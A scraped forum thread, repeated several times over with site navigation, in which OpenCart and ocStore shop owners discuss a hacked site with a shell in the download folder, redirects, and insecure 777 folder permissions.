24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? Потому что очень уж спокойно вам залили shell в папку download Какие модули стоят и какие vqmod допилы? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Стабильная тема. Плюс еще файлы назвать именами контроллеров и т.п. Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 24 лютого 2014 Автор Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера а какой у вас хостинг? Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Стабильная тема. Плюс еще файлы назвать именами контроллеров и т.п. Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 24 лютого 2014 Автор Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера а какой у вас хостинг? Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
sitecreator Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 24 лютого 2014 Автор Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера а какой у вас хостинг? Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера Надіслати Поділитися на інших сайтах More sharing options...
dexion Опубліковано: 24 лютого 2014 Автор Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера а какой у вас хостинг? Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000
2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options...
sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус
2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options...
